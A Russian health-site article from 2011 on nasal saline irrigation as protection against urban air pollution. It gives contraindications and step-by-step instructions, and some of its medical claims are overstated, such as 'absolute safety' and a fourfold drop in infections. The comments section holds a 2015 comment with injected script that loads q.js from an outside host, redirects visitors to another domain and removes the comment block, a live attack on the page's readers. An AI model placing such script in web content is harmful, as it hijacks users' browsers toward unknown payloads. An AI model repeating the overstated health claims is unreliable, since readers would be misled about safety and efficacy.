Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Нос – всему голова  >>  Нос – всему голова
 
Обратная связь
 

Нос – всему голова

Размер шрифта
09 июня 2011 00:01
  • google_analytics: false
  • Нравится

Мокрый нос – признак здоровья не только у собак, но и у людей. Только речь идет не о насморке, а о процедуре. Для жителей мегаполисов промывание полости носа должно стать такой же полезной привычкой, как ежедневная чистка зубов, уверены российские оториноларингологи.

Нос – всему голова

Полина Скрябина / «Здоровье-инфо»

С каждым годом в самый населенный город в стране и целой Европе, Москву, едет все больше людей. За последние 8 лет население Москвы выросло на 1,5 миллиона, и это только по официальным данным. Но приезжие, стремящиеся к благам цивилизации, приехав в мегаполис, расплачиваются за это сполна. И не только часами в пробках и высокими ценами. Низкий иммунитет, стресс, сердечно-сосудистые заболевания, болезни органов дыхания – вот неполный список того, чем жертвует столичный житель во имя жизни в центре страны. По оценке ВОЗ, в любом мегаполисе средняя продолжительность жизни на 4 года меньше, чем вне его! Так что речь идет не о жизни, а о выживании.

Не дышать!

Злейший враг жителя мегаполиса – загрязненный воздух. Ежегодно 40 тысяч человек погибает от болезней, с ним связанных. И это только в России. Опасность всюду: смог, выхлопные газы, бытовая пыль, пылевые клещи, споры грибов, вирусы и бактерии – все это содержится в воздухе, которым мы дышим. Неудивительно, что защитные функции слизистой дают сбой. Начинается воспаление, и возбудитель попадает в легкие.

Другая беда – аллергия и ее последствия: чихание, затруднение носового дыхания, ринорея, зуд. Такая реакция возникает при чрезмерной нагрузке на органы дыхания, при которой иммунная защита слизистой оболочки полости носа начинает давать сбои. Нередко именно так и начинается астма.

Кто виноват?

Главный загрязнитель воздуха – автотранспорт. В 4 часа утра Москва, еще не связанная пробками, является одним из чистых городов России. Но ближе к часу пик ситуация меняется кардинально. Ученые уже установили связь между загрязнением воздуха свинцом, бензопиреном, оксидами азота и частотой онкологических заболеваний, врожденных аномалий, болезнями нервной системы. Еще страшнее, что в группе риска – дети. Но первыми принимают на себя удар те, кто работают на транспорте или вблизи автомагистралей. Они попросту обречены. После 10 лет работы каждому ставят диагноз: хроническая обструктивная болезнь легких, или ХОБЛ.

От грязи, летающей вокруг не спастись ни в салоне автомобиля, ни в офисе (кстати, в воздухе там витает около 100 опасных химических соединений). Пыль от копировальных машин и принтеров – вообще наш враг номер один. И все это на фоне пониженной влажности офиса, которую усугубляют работающие кондиционеры.

«Промывание носа – барьер для вирусов»

За сутки наш нос перекачивает около 17 тысяч литров воздуха. И задерживает почти все взвешенные в воздухе частицы и микроорганизмы. Как же сохранить свое здоровье в агрессивной среде столицы? Медики пришли к выводу, что наиболее эффективная и оптимальная процедура – это промывание носа. Для сравнения: при вакцинации Грипполом заболеваемость ОРВИ среди школьников уменьшается в 2 раза, а при профилактике посредством промывания носовой полости заболеваемость падает в 4 раза! В пользу промывания говорят и абсолютная безопасность процедуры, и полное отсутствие болезненных ощущений. Вот почему она показана даже маленьким детям.

К слову сказать, процедура эта не вновь придуманная. Джала Нети, или промывание носа соленой водой, является одним из самых популярных методов очищения тела в Крия Йоге, а также лучшим методом профилактики и лечения простуды. Общественная организация «Лига здоровья нации» решила пойти по следам гуру и совместно с ведущими оториноларингологами России проводит акцию «Промывание носа – барьер для вирусов» для проведения образовательно-профилактических программ для сотрудников московских организаций, находящихся в группе риска по негативному влиянию экологических факторов.

Методика промывания носа несложна. Необходимо всего лишь специальное устройство и сбалансированный солевой раствор. Организаторы акции и оториноларингологи уверены: эта гигиеническая процедура должна стать такой же привычной для россиян вещью, как ежедневная чистка зубов.

Мастер-класс по промыванию носа

Прежде чем проводить процедуру, убедитесь, что вы не страдаете:

  • Непроходимостью носовых ходов (полипы носа)
  • Частыми кровотечениями из носа
  • Новообразованиями в полости носа и придаточных пазухах (как злокачественными, так и доброкачественными)
  • Острым отитом или хроническим отитом в стадии обострения

Итак, для начала нужно приготовить солевой раствор. В идеале он должен быть приближенным по своему составу к плазме крови человека. Можете изготовить его сами, а если боитесь напутать нужные пропорции, используйте уже готовые растворы, которые продаются в каждой аптеке. Так исчезнет риск пересушить слизистую. Промывайте нос с помощью специального баллона-эригатора, который позволяет регулировать мощность струи.

1. Наклонитесь вперед под углом 90°

2. Вдохните и задержите дыхание

3. Плотно прижмите устройство для промывания к правой ноздре

 

4. Медленно и плавно сжимайте емкость, пока раствор не польется из левой ноздри

Медленно и плавно сжимайте емкость, пока раствор не польется из левой ноздри

5. После баллон можно разжать

После баллон можно разжать

6. Для удаления остатков раствора желательно высморкаться, держа рот приоткрытым

7. Повторите процедуру с левой ноздрей

Оториноларингологи особенно рекомендуют именно полное объемное промывание носа (как показано на нижней фотографии). Во-первых, такой метод, в отличие от спреев, аэрозолей и струйных промывателей, не просто увлажняет слизистую носа, а полностью очищает носовые ходы от всех неблагоприятных агентов: аллергенов, пыли, бактерий, вирусов. Во-вторых, жидкость при полном объемном промывании заполняет полость носа без напора, и слизистая при этом не травмируется. Наконец, такой метод способствует регенерации поврежденных клеток эпителия.

Что получаем в итоге?

  • Во-первых, полноценное дыхание
  • Полное промывание позволяет вычистить всю носовую полость, в отличие от спреев, которые омывают лишь передний носовой ход
  • Профилактика и лечение гриппа и ОРВИ
  • Профилактика и лечение хронических, профессиональных, аллергических ринитов
  • Лечение синуситов
  • Облегчение носового дыхания при работе во вредных условиях
  • Предупреждение тонзиллита
  • Терапия синдрома сухого носа
  • Лечение аденоидитов у детей

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:11

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Разрушители иммунитета. Что лишает вас защиты от болезней   Как не заболеть зимой. Перезимуем без таблеток!   Болезни-близнецы. Как не ошибиться в лечении кашля   Грипп и ОРВИ у детей-аллергиков. Как помочь ребенку?  
05 февраля 2013Почему мы болеем гриппом зимой 25 июля 2011Родительский стресс напрямую влияет на здоровье ребенка
 
13 июля 2011Грязный воздух снижает интеллект 06 июня 2013Ваши сопли скажут, сумасшедший ли вы
 

Слайдшоу

1
Термометр i-Temp mini
Термометр Flex Temp
Как избавиться от больного горла?

Тесты

1
Заболеет ли ваша семья?
Грипп или простуда?
Почему болит горло?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.